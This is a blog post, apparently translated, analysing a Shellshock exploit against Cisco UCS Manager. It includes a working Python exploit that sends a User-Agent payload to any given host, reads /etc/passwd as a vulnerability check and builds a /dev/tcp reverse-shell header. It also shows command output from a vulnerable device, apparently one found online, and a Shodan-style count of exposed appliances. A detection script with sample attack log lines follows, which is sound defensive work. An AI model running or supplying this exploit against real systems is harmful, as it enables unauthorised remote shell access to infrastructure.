
An exploit for vulnerabilities in Cisco UCS Manager: is the devil as black as he is painted?

An exploit for Cisco UCS Manager has been published online. Version 2.1(1b), and possibly others, are reported to be vulnerable.
On the Cisco website, the advisory section for the GNU Bash Environment Variable Command Injection Vulnerability (Shellshock) states that updated versions of the affected products that fix the vulnerability are available:

Our own testing showed the following versions to be vulnerable:

Not vulnerable:

We analyzed how the exploit works and estimated the number of vulnerable devices, using the Shodan search engine and our own home-grown equivalent (long live import substitution). Here is what we found.

Judging by the exploit code, the commands are injected through the User-Agent header of an HTTPS request to a specially crafted URL. The exploit works in two stages. In the first stage it checks whether the system is vulnerable: it reads the user file /etc/passwd and looks for the user root. In the second stage it opens a reverse connection to the attacker-controlled host, using bash's /dev/tcp pseudo-device.
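As an added example (this is not the published exploit and not code from the original post), here is how the two stages described above can be expressed in Python: a Shellshock payload carried in the User-Agent header, a stage-1 check that looks for the root entry in the returned /etc/passwd, and a stage-2 reverse shell over bash's /dev/tcp. The request path PROBE_PATH and the attacker host and port are placeholders, since the post does not give the real UCS Manager URL; the sample reply is constructed from the /etc/passwd dump shown later in the post, and the stage-1 variant assumes the CGI returns command output in the response body.

```python
"""Added example, not code from the original post or the published exploit.
Builds the two Shellshock stages described above and interprets the stage-1
reply. PROBE_PATH and the attacker host/port are placeholders (assumptions):
the post does not give the real UCS Manager URL."""
import http.client
import re
import ssl

# Bash parses a function definition stored in any environment variable (here,
# the CGI's HTTP_USER_AGENT) and keeps executing whatever follows the body.
SHELLSHOCK_PREFIX = "() { :; }; "
PROBE_PATH = "/cgi-bin/probe"  # placeholder, not the real vulnerable URL


def stage1_user_agent(cmd="cat /etc/passwd"):
    """Stage 1: run a command whose output comes back in the response body.
    The leading `echo` emits a blank line so the CGI's header section ends
    before the command output starts."""
    return f"{SHELLSHOCK_PREFIX}/bin/bash -c 'echo; {cmd}'"


def stage2_user_agent(lhost, lport):
    """Stage 2: interactive bash connected back to lhost:lport through the
    /dev/tcp pseudo-device, so no netcat is needed on the appliance."""
    return f"{SHELLSHOCK_PREFIX}/bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


_F = r"[^:\r\n]*"  # one passwd field: no colon, no line break
PASSWD_LINE = re.compile(
    rf"^(?P<user>[^:\r\n]+):{_F}:(?P<uid>\d+):(?P<gid>\d+):{_F}:"
    rf"(?P<home>{_F}):(?P<shell>{_F})\r?$",
    re.MULTILINE,
)


def parse_passwd(body):
    """Map user -> (uid, login shell) for every passwd-style line in body."""
    return {m["user"]: (int(m["uid"]), m["shell"]) for m in PASSWD_LINE.finditer(body)}


def looks_vulnerable(body):
    """Stage-1 decision used by the exploit: a root passwd entry came back."""
    return "root" in parse_passwd(body)


def probe(host, port=443, path=PROBE_PATH, timeout=10.0):
    """Send the stage-1 request over HTTPS and return the response body."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # appliance presents a self-signed cert
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    conn.request("GET", path, headers={"User-Agent": stage1_user_agent()})
    body = conn.getresponse().read().decode("latin-1", "replace")
    conn.close()
    return body


# Constructed reply, reproducing part of the /etc/passwd dump shown in the post.
SAMPLE_REPLY = (
    "root:*:0:0:root:/root:/isanboot/bin/nobash\n"
    "daemon:*:2:2:daemon:/usr/sbin:\n"
    "admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm\n"
    "samdme:x:2003:504::/var/home/samdme:/bin/bash\n"
)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    body = probe(target) if target else SAMPLE_REPLY   # offline run uses the sample
    print("vulnerable" if looks_vulnerable(body) else "not vulnerable")
    print("stage-2 header:", stage2_user_agent("10.0.0.1", 4444))
```

Run without arguments the script evaluates the constructed reply; with a host argument it sends the stage-1 probe (an old appliance may only offer TLS 1.0, which a modern OpenSSL build refuses by default, so adjust the context if the handshake fails). Note that parse_passwd also exposes each account's login shell: root's shell is /isanboot/bin/nobash, so finding root in the file says the target runs bash for the CGI, not that the injected commands run as root.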

We found vulnerable hardware, and I was able to play around with the exploit a bit.
Executing commands:
$ whoami
daemon


Reading the contents of /etc/passwd:

$ cat /etc/passwd
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:*:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
svc-isan:*:499:501::/var/home/svc-isan:/isan/bin/vsh_perm
samdme:x:2003:504::/var/home/samdme:/bin/bash


That is, the root user really does exist (though its login shell is /isanboot/bin/nobash), and the vulnerable software runs as the daemon user, so the injected commands run as daemon, not as root.
Many ports are also open. Here is a short list.
$ netstat -ln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:161 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:36738 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6021 0.0.0.0:* LISTEN
tcp 0 0 127.12.0.1:4101 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5991 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:7911 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5961 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:906 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:907 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6351 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5871 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6321 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5841 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5781 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6261 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:51189 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:4023 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:27000 0.0.0.0:* LISTEN



$ uname -a
Linux UCS078A-AA 2.6.27.10 #1 SMP Fri Nov 15 03:08:09 PST 2013 i686 i686 i386 GNU/Linux

$ cat /etc/*release
Wind River Linux


Injecting code through the User-Agent string is common practice. For example, the Shellshock detection script for the nmap scanner (http-shellshock) uses the same header by default. That said, I personally could not get this script to actually identify the vulnerability on the Cisco UCS Manager equipment I tested.
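Because the injection lands in whichever request header the CGI exports as an environment variable, a detection rule should not key on User-Agent alone: Referer, Cookie and other headers reach bash the same way. As an added example (not from the post and not part of any scanner), the rule below scans Apache combined-format access log lines, where both Referer and User-Agent are recorded, for the Shellshock function-definition marker and classifies what the payload tries to do. The log lines are constructed for the example, and the /cgi-bin/probe path in them is a placeholder.

```python
"""Added example, not from the original post: Shellshock detection over
access-log lines. The log lines below are constructed, not real traffic."""
import re

# Apache/nginx "combined" format: the last two quoted fields are Referer and
# User-Agent; a quoted field may contain backslash-escaped quotes.
_Q = r'"((?:[^"\\]|\\.)*)"'
LOG_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + _Q + r' (\d{3}) (\S+) ' + _Q + r' ' + _Q + r'$'
)

# The marker bash looks for when importing a function from the environment:
# "()" followed by "{" with optional whitespace. Matching it in any
# client-controlled header is the core of the rule.
SHELLSHOCK = re.compile(r"\(\)\s*\{")


def classify(payload):
    """Rough intent of an injected command string."""
    if "/dev/tcp/" in payload:
        return "reverse-shell"   # stage 2 of the exploit discussed above
    if "/etc/passwd" in payload:
        return "recon"           # stage 1: read /etc/passwd
    return "other"


def scan_log(text):
    """Return (client_ip, header_name, intent) for every line carrying a
    Shellshock marker in Referer or User-Agent; malformed lines are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _ts, _req, _status, _size, referer, ua = m.groups()
        for name, value in (("Referer", referer), ("User-Agent", ua)):
            if SHELLSHOCK.search(value):
                hits.append((ip, name, classify(value)))
    return hits


# Constructed sample: one benign request, the two exploit stages, and a probe
# hidden in Referer rather than User-Agent.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2016:12:00:01 +0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [10/Apr/2016:12:00:02 +0300] "GET /cgi-bin/probe HTTP/1.1" 200 1042 "-" "() { :; }; /bin/bash -c 'cat /etc/passwd'"
198.51.100.7 - - [10/Apr/2016:12:00:03 +0300] "GET /cgi-bin/probe HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'"
198.51.100.9 - - [10/Apr/2016:12:00:04 +0300] "GET /cgi-bin/probe HTTP/1.1" 200 0 "() {:;}; /bin/bash -c 'id'" "curl/7.47.0"
garbage line that is not in combined format
"""

if __name__ == "__main__":
    for ip, header, intent in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {header:10} {intent}")
```

The marker regex is deliberately loose about whitespace ("() {" and "(){" both match) because bash accepted both at the time; if your logs only record User-Agent, the third hit above would be invisible, which is the argument for logging or inspecting the full header set on internet-facing CGI hosts.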

A Shodan search for the query "Cisco UCS Manager" returns nothing. The query "Cisco UCS" returns a great deal, among which 7 addresses belong to the device we are after. The problem seems to be that Shodan cannot search for a multi-word substring: every word is searched for separately. Then again, maybe I am just an inexperienced Shodan user.
At the PHDays 2015 conference my colleague and I presented our own search engine, similar to Shodan.

A search with the naive query across two /16 networks:


We mainly explained how the search engine works, but we also raised the problem of searching for specific equipment: the query has to find as many devices as possible while returning as little junk as possible. In particular, we suggested the idea of a kind of digital fingerprint. In short: equipment is configured differently (default or custom settings, a device behind a firewall or behind NAT). Studying each case by trial and error, and drawing on accumulated experience, one builds a far from trivial query whose results can differ greatly from the naive initial search. That is what happened here. For example, as the screenshot above shows, the string "OpenSSL/FIPS" appears in the responses of the device we are looking for. Searching for this string in Shodan disappoints again: the results once more show no clear search phrase. Searching for it in our engine increased the number of addresses found compared with the previous search, although, frankly, the search still returns junk entries, that is, records which on inspection have nothing in common with Cisco UCS Manager.
In general, building digital fingerprints (including for specific devices) is a topic for a separate article. I will limit myself to the result: we found about 50 devices with unique IP addresses (it is not entirely correct to speak of the number of devices found, since each device can have several network interfaces with different addresses), mostly in the USA.

We are currently considering whether to open our search engine to a wider audience, if there is interest from the community.

Source: https://habr.com/ru/post/280364/

